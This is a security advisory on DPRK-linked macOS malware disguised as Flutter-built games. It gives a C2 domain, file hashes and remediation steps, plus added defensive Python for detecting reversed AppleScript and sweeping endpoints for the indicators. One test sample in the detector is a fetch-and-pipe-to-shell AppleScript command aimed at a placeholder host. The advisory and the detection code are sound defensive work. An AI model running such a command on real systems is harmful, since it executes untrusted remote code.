

November 13, 2024
Severity
High
Analysis Summary
North Korean threat actors have adopted a novel approach to targeting Apple macOS devices: embedding malware in applications built with the Flutter framework. This is the first time the tactic has been observed. The malicious apps are disguised as functional software, including a Minesweeper game named "New Updates in Crypto Exchange (2024-08-28)".
According to the researchers, the primary payload is written in Dart, the language in which Flutter applications are built. The apps use game-themed lures, a technique previously linked to other North Korean groups such as Moonstone Sleet, which suggests a consistent pattern of social engineering aimed at cryptocurrency and decentralized finance (DeFi) businesses.
How the samples are distributed remains unclear, and there is no evidence yet that they have been deployed against targets; the researchers suspect they may be part of a testing phase. The apps were signed and notarized with compromised Apple developer IDs, which allowed them to pass Apple's notarization and Gatekeeper checks. Apple has since revoked the signatures. Once executed, the malware connects to a command-and-control server ("mbupdate.linkpc[.]net") and runs AppleScript commands received from it; the scripts are written in reverse to evade detection.
Further investigation revealed variants written in Golang and Python, showing that the actors use multiple programming languages to obscure their activity. The Python variants, packaged with py2app, are likewise capable of executing AppleScript payloads received from the server. This multi-language approach indicates an intent to produce diverse, frequently updated iterations of the malware that stay undetected, with Flutter's architecture providing additional obfuscation.
The activity has not been attributed to a specific group, but overlaps with infrastructure used in earlier campaigns suggest ties to BlueNoroff, a Lazarus sub-group known for targeting cryptocurrency firms. The shift to Flutter-built apps signals an evolving strategy for infiltrating cryptocurrency organizations and underscores the sophistication and adaptability of DPRK-linked operations and their commitment to stealthy, innovative malware.
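Both the Flutter/Dart samples and the Python variants above execute AppleScript received from the C2, and the advisory notes the scripts are written in reverse. The following is an added triage heuristic (not code from the advisory or the researchers) that scans a C2 response body or a string extracted from a sample for common AppleScript phrases in both orientations and recovers the forward text when the blob is reversed. The marker list and the sample payloads are assumptions constructed for this demonstration; they are not taken from the malware.

```python
"""Added example (not from the advisory or the researchers): flag AppleScript
that has been written backwards, as described in the advisory. The marker
list and the sample blobs below are constructed assumptions for the demo."""

# AppleScript/osascript phrases a reviewer would recognise (assumed marker list).
APPLESCRIPT_MARKERS = (
    "tell application",
    "end tell",
    "do shell script",
    "osascript",
    "display dialog",
)


def find_script_markers(blob):
    """Return sorted (offset, marker, orientation) for every marker that appears
    in blob (str or bytes) written forwards or backwards. Scanning for the
    reversed marker directly avoids reversing large bodies and keeps offsets."""
    text = blob.decode("utf-8", "replace") if isinstance(blob, bytes) else blob
    low = text.lower()
    hits = []
    for marker in APPLESCRIPT_MARKERS:
        for needle, orientation in ((marker, "forward"), (marker[::-1], "reversed")):
            start = low.find(needle)
            while start != -1:
                hits.append((start, marker, orientation))
                start = low.find(needle, start + 1)
    return sorted(hits)


def classify_script(blob):
    """Label a blob 'applescript', 'reversed-applescript', or None, based on
    which orientation the markers predominantly appear in."""
    hits = find_script_markers(blob)
    if not hits:
        return None
    forward = sum(1 for _, _, orientation in hits if orientation == "forward")
    backward = len(hits) - forward
    return "reversed-applescript" if backward > forward else "applescript"


def recover_script(blob):
    """If the blob is reversed AppleScript, return it reading forwards;
    otherwise return the text unchanged."""
    text = blob.decode("utf-8", "replace") if isinstance(blob, bytes) else blob
    return text[::-1] if classify_script(text) == "reversed-applescript" else text


# Constructed samples: a forward script, the same script reversed inside a
# pretend C2 response body, and benign text from a game's help screen.
FORWARD_SAMPLE = 'do shell script "curl -s http://example.invalid/x | sh"'
REVERSED_C2_BODY = b"header\n" + FORWARD_SAMPLE[::-1].encode() + b"\n"
BENIGN = "Minesweeper: left click reveals a cell, right click flags it."


if __name__ == "__main__":
    for label, sample in (("forward", FORWARD_SAMPLE),
                          ("c2 body", REVERSED_C2_BODY),
                          ("benign", BENIGN)):
        print(label, classify_script(sample), find_script_markers(sample))
    print(recover_script(REVERSED_C2_BODY))
```

This is a string-level heuristic only: it catches the specific reversal trick the advisory describes and nothing more, so treat a hit as a reason to pull the sample for analysis, and pair it with endpoint telemetry for `osascript` being spawned by an application that has no business running AppleScript.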
Impact
- Security Bypass
- Cryptocurrency Theft
- Financial Loss
- Unauthorized Access
Indicators of Compromise
Domain Name
- mbupdate.linkpc.net
MD5
- d4bcc74e261c5c5f5672b4e101965d8d
- 18c274cd1ea6a140a574327df01d9980
- c47932089c8db6bca6a2bb4173b74ca5
- 97b973d5efb2d2930286a4ba85dd3ae4
- f6357545c0ed118d0763ff6da8e04493
- 7c3f2e37aca9730e11a771fcd756963a
- 6817c88c299241643864cf35800d71d2
- ea0e8ea3aab4e93e2536dada37599e22
- f819817aad90aadfbb36d23cb4ee6234
SHA-256
- bfd3f0046b4c4221dfb5ae459c7ec3438de6bf69e263cfd01b256ffd0494ae07
- 55a746c1d61cd4db4018c468749e61cc79de56c37bd42fee5411873d1d91e4a5
- d62198d7d26bea9cebd71b2f04b02fe1a1467973a5eb891885fdb3e8d87c5d4c
- 435db426ea6410309487b2a1b3565e4c3f6c300d788850d2188255fc98bffb98
- e96a23042a0ed4217d6a90b2ecdcee2ec8eec7fbb275b9f21c998be2958c690f
- ab0a04e2a492fe19410ba395879a6c9eb9fa8b2aaf55c5fcf44666bb6a0a08b3
- f3d0b74410e6eb732579ba55b4e79fd63214e6fe78c9cc89aeb1dbcab7dec339
- 9803e2946f19710f4f78cf5c3fea52085304be4479487954f7e6945872c07b89
- a5a530fdecf65f6a48db6c496957116837d076fc15f732054a5e6334daf9f323
SHA-1
- 6fa932f4eb5171affb7f82f88218cca13fb2bfdc
- a12ad8d16da974e2c1e9cfe6011082baab2089a3
- eadfafb35db1611350903c7a76689739d24b9e5c
- 7cb8a9db65009f780d4384d5eaba7a7a5d7197c4
- 0b9b61d0fffd52e6c37df37dfdffefc0e121acf7
- ee22e7768e0f4673ab954b2dd542256749502e97
- dd38d7097a3359dc0d1c999225286a2f651b154e
- 9598e286142af837ee252de720aa550b3bea79ea
- 90e0e88e5b180eb1663c2b2cfe9f307ed03a301b
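The indicators above are only useful once they are actually swept across endpoints and logs. The following added example (not tooling from the advisory or the researchers) hashes every file under a directory tree with MD5, SHA-1 and SHA-256 in one pass and matches the results against the advisory's hash sets, and scans DNS/proxy log lines for the C2 domain or any subdomain of it. The hash sets hold a representative subset of the indicators listed above; the log lines, the log format, the hostname regex, and the temporary file written by `demo()` are constructed assumptions for the demonstration.

```python
"""Added example (not from the advisory or the researchers): sweep a directory
tree and DNS/proxy log lines for this advisory's IOCs. The sample log lines
and the temporary file used by demo() are constructed for the demonstration."""
import hashlib
import os
import re
import tempfile

# Hash IOCs copied from the advisory (representative subset; extend as needed).
IOC_MD5 = {
    "d4bcc74e261c5c5f5672b4e101965d8d",
    "18c274cd1ea6a140a574327df01d9980",
}
IOC_SHA1 = {
    "6fa932f4eb5171affb7f82f88218cca13fb2bfdc",
    "a12ad8d16da974e2c1e9cfe6011082baab2089a3",
}
IOC_SHA256 = {
    "bfd3f0046b4c4221dfb5ae459c7ec3438de6bf69e263cfd01b256ffd0494ae07",
    "55a746c1d61cd4db4018c468749e61cc79de56c37bd42fee5411873d1d91e4a5",
}


def refang(text):
    """Undo common defanging ('[.]', 'hxxp') so feed entries compare with live logs."""
    return text.lower().replace("[.]", ".").replace("hxxp", "http")


# The C2 domain as written (defanged) in the advisory text, normalised once.
IOC_DOMAINS = {refang("mbupdate.linkpc[.]net")}

# Assumed, deliberately loose hostname pattern for free-text log lines.
HOST_RE = re.compile(r"\b[a-z0-9][a-z0-9.-]*\.[a-z]{2,}\b")


def matches_domain(host):
    """True if host is an IOC domain or a subdomain of one (never a parent)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def sweep_log(lines):
    """Return (line_number, hostname) for every log line referencing an IOC domain."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for host in HOST_RE.findall(refang(line)):
            if matches_domain(host):
                hits.append((number, host))
    return hits


def hash_file(path, chunk_size=1 << 20):
    """Return (md5, sha1, sha256) hex digests of a file, read once in chunks."""
    digests = (hashlib.md5(), hashlib.sha1(), hashlib.sha256())
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for digest in digests:
                digest.update(chunk)
    return tuple(digest.hexdigest() for digest in digests)


def classify_digests(md5, sha1, sha256):
    """Return the names of the IOC hash sets that contain the given digests."""
    found = []
    if md5.lower() in IOC_MD5:
        found.append("md5")
    if sha1.lower() in IOC_SHA1:
        found.append("sha1")
    if sha256.lower() in IOC_SHA256:
        found.append("sha256")
    return found


def sweep_files(root):
    """Walk root and return (path, matching hash sets) for every IOC hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                matched = classify_digests(*hash_file(path))
            except OSError:
                continue  # unreadable or vanished file; skip rather than abort the sweep
            if matched:
                hits.append((path, matched))
    return hits


# Constructed sample log lines. linkpc.net itself is a dynamic-DNS provider
# and must not match; only the IOC host and its subdomains should.
SAMPLE_LOG = [
    "2024-11-13T10:01:02Z dns src=10.0.0.5 qname=mbupdate.linkpc.net type=A",
    "2024-11-13T10:01:03Z dns src=10.0.0.5 qname=updates.apple.com type=A",
    "2024-11-13T10:02:10Z proxy CONNECT api.mbupdate.linkpc.net:443 src=10.0.0.7",
    "2024-11-13T10:03:00Z proxy CONNECT linkpc.net:443 src=10.0.0.9",
]


def demo():
    """Hash a benign temporary file and sweep it; returns (digests, file_hits, log_hits)."""
    with tempfile.TemporaryDirectory() as tmp:
        benign = os.path.join(tmp, "notes.txt")
        with open(benign, "wb") as fh:
            fh.write(b"hello")
        digests = hash_file(benign)
        file_hits = sweep_files(tmp)
    return digests, file_hits, sweep_log(SAMPLE_LOG)


if __name__ == "__main__":
    print(demo())
```

Point `sweep_files` at `/Applications`, user `Downloads` folders, or a mounted forensic image, and feed `sweep_log` from your DNS resolver or proxy export; the hash sets are deliberately plain `set` literals so the full list from this advisory can be pasted in.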
Remediation
- Block the listed indicators at your respective controls (DNS, web proxy, firewall, EDR, mail gateway).
- Search for the indicators of compromise (IOCs) in your environment using your respective security controls: hash-match files on macOS endpoints against the MD5/SHA-1/SHA-256 values above and review DNS and proxy logs for mbupdate.linkpc.net and its subdomains.
- On macOS, keep Gatekeeper enabled so that applications whose developer signatures or notarization Apple has revoked are refused; unknown applications can be assessed with `spctl --assess --verbose <path-to-app>`. Note that a valid signature and notarization are not proof of legitimacy, since these samples were signed with compromised Apple developer IDs.
- Monitor macOS endpoints for AppleScript execution (osascript) spawned by applications that have no reason to run scripts, such as games or other Flutter-built apps.
- Only install applications from the Apple App Store or directly from a verified vendor; avoid third-party download sites, which are less regulated and more likely to host malicious apps.
- Review the permissions an app requests during installation. If an app asks for permissions unrelated to its functionality, treat that as a red flag.
- Never trust or open links and attachments from unknown sources or senders, and be especially wary of unsolicited game or "crypto update" downloads in cryptocurrency and DeFi organizations.
- Encourage individuals to report suspicious activity, emails, or messages to the relevant security team or authorities.
- Verify the authenticity of websites, social media profiles, and apps before providing personal information or engaging with them.
- Implement strong multi-factor authentication (MFA) for email accounts, social media profiles, and other sensitive online services.
- Keep operating systems and all software up to date with the latest security patches, and make timely patching a standard security policy; prioritize known exploited vulnerabilities and zero-days.
- Employ robust network security measures, including firewalls and intrusion detection systems, to detect and block malicious network traffic.
- Develop and maintain an incident response plan that outlines the steps to take in case of a security breach, and ensure individuals and teams know how to respond effectively.
- Enable anti-virus and anti-malware software, update signature definitions promptly, and use multi-layered protection for vulnerable assets.